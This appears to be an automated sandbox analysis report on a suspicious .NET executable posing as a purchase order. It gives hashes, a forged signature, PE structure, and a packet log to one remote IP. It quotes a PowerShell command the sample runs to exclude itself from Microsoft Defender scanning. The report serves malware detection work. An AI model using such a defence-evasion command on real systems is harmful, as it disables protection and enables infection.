                                                                                    Encrypted:false
                                                                                    SSDEEP:96:BZYhtNcqDo1Z5ZchtNcqDo1ZqMGkjZmhtNcqDo1Zj100/Z8:Y
                                                                                    MD5:360118D3E5E153530C9CF66B5A41EFFB
                                                                                    SHA1:93A5D02A88AC85B0C6A71B509455F0D9A1605A47
                                                                                    SHA-256:A52C0F3D078CB67B58D27BC1A139A66965557978522977DE39EF408F7B060DEE
                                                                                    SHA-512:060F0692A71A5BF4CB43A2952A168D96D0EA2B6249DBB650FCBCB72B26D2F755DE2CA20FDAA34AEEC13D782C3F5F8731844FB8C184B3D368CD568D60B03C5902
                                                                                    Malicious:false
                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408122439..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..Process ID: 5828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408122439..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\08042021New-PurchaseOrder.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210408122729..Username: computer\user..RunA
                                                                                    C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUoj
                                                                                    Process:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):5128155
                                                                                    Entropy (8bit):3.033446165324156
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:yKhvmsqbzKhvmsqbpedqCzKhvmsqbpedqCt:U
                                                                                    MD5:14F9C1984DB22EF66B73F7818CCD792A
                                                                                    SHA1:DD973A3668A9B7C5D505EF132D191B42BCDF8879
                                                                                    SHA-256:37DB6E90DF6101E3FD7D1DC2A0FC476EE0EB3AD7FD50AFFD8A89E447668758F2
                                                                                    SHA-512:B95110CBAC27CDCCCB1A8A320AB04EF8341BA79CAEA28DC4FA3647C53AE35A645225C97D3384D3750B7DB8E6E46E9DF9887A34CDFACF317B64CAE07B3D511E47
                                                                                    Malicious:false
                                                                                    Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 102 10 0 0 6 0 0 0 0 0 0 94 133 10 0 0 32 0 0 0 160 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 10 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 4 133 10 0 87 0 0 0 0 160 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 10 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 100 101 10 0 0 32 0 0 0 102 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 9

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):6.50608873264544
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:08042021New-PurchaseOrder.exe
                                                                                    File size:32008
                                                                                    MD5:27233176a2a979195b01a53ec16c7631
                                                                                    SHA1:0ef424d2000f18e6b83473535bf85d22ed9ab79b
                                                                                    SHA256:397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
                                                                                    SHA512:f8a620ca97069fa352621bb76c1c83bdebb7692f0b80de2e9d273ebb718d4d4ba412f2b057580023bd646da09647d82e035f6c2ad28e59200b7433fd1ab2d0e7
                                                                                    SSDEEP:768:/FmaU0mnYm/8KfVJlIAHcQxGflnBieit0JLkbPd2HdPIZy75V3qKncMrGDDkhx6Z:/FmaU0mnYm/XfFHcQiv2
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..^..........~}... ........@.. ..............................S.....@................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x407d7e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                    Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 4/8/2021 12:06:52 AM 4/8/2022 12:06:52 AM
                                                                                    Subject Chain
                                                                                    • C=SoWutqXeLnMOwqJXId, S=NnUboBWoYwqDIwY, L=MbQcaOFzeHlcRYjymxStxewIKRBTmsTOLhaAui, T=TzAsjhqPvzbVTQm, E=aWqTCgKxvSbvBYMruQaKZAVvZLTXwFQbGWtnMFYTbrwiC, OU=VDEHuCSrWVaYfpynkGXgslgiPshrtkDGheEyNpkXvynJDYrAu, O=LNLPWkIrAxQDzcsXFAnPjFEWxPTohWRIy, CN=QyacKfEuUpipdGqortkydaovyOIOBGilxuiv
                                                                                    Version:3
                                                                                    Thumbprint MD5:02D117FF6729F8502B772DCB43B50C3A
                                                                                    Thumbprint SHA-1:AD87EC167C0EE2A6460B720995D1615054EFD17C
                                                                                    Thumbprint SHA-256:EAC36CA8694D2ABDF442E1AD9F62C45DDF61B2AF796C976F70010E21DABF7754
                                                                                    Serial:0085C0DD93B9A20656D03F3DDE5B6544CB

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7d280x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x598.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x68000x1508.text
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x5d840x5e00False0.310588430851data6.24624470623IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x80000x5980x600False0.41015625data4.03133223021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0xa0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0x80a00x30cdata
                                                                                    RT_MANIFEST0x83ac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0000 0x04b0
                                                                                    LegalCopyrightCopyright 2021
                                                                                    Assembly Version1.0.0.0
                                                                                    InternalNameDimbono.exe
                                                                                    FileVersion1.0.0.0
                                                                                    CompanyName
                                                                                    LegalTrademarks
                                                                                    Comments
                                                                                    ProductNameDimbono
                                                                                    ProductVersion1.0.0.0
                                                                                    FileDescriptionDimbono
                                                                                    OriginalFilenameDimbono.exe

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Apr 8, 2021 12:23:50.074418068 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103115082 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.103264093 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.103962898 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.132519007 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.195653915 CEST8049703172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.226291895 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.254749060 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.254941940 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.285983086 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.315032005 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.318490982 CEST4970380192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.351553917 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351607084 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.351763964 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.359153032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.387747049 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.388421059 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.451097012 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.479623079 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662647963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662663937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662692070 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662703037 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662728071 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662739992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662756920 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662767887 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662791014 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662801981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.662869930 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.662909031 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663194895 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663213015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.663480043 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.663499117 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827023029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827039003 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827157974 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827208996 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827210903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827601910 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827622890 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.827708960 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.827974081 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.828218937 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828233004 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.828324080 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829154015 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829169035 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829372883 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.829495907 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829551935 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.829683065 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830291033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830306053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.830651999 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.830780029 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831639051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831650972 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831671000 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.831770897 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832148075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832160950 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832395077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.832854033 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832868099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.832951069 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.833547115 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833559990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.833734035 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.834213018 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834225893 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.834347963 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835005999 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835035086 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835417032 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.835597992 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835613012 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.835979939 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.836270094 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836349010 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836896896 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.836910963 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837260962 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837270975 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.837651968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.837676048 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838177919 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838206053 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838280916 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.838500977 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.838963032 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855664968 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855694056 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855797052 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.855849981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.855865002 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856442928 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.856614113 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.856654882 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857201099 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857217073 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857323885 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.857335091 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.857865095 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.857883930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.858735085 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.858747005 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859267950 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859285116 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859564066 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859582901 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859586000 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.859863997 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.859885931 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860078096 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.860590935 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860644102 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.860749006 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.861264944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861407042 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.861639023 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861656904 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.861959934 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.862247944 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.862273932 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.862973928 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863073111 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863204956 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.863219976 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.863586903 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863600969 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.863701105 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.864243031 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.864381075 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865186930 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865209103 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865699053 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865715981 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.865822077 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.865842104 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.865850925 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.866300106 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866317034 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866528034 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.866925001 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.866969109 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.867186069 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.867615938 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.867633104 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868231058 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868246078 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868952990 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.868998051 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869590998 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869613886 CEST44349704172.67.150.212192.168.2.3
                                                                                    Apr 8, 2021 12:23:50.869622946 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.869841099 CEST49704443192.168.2.3172.67.150.212
                                                                                    Apr 8, 2021 12:23:50.870212078 CEST44349704172.67.150.212192.168.2.3
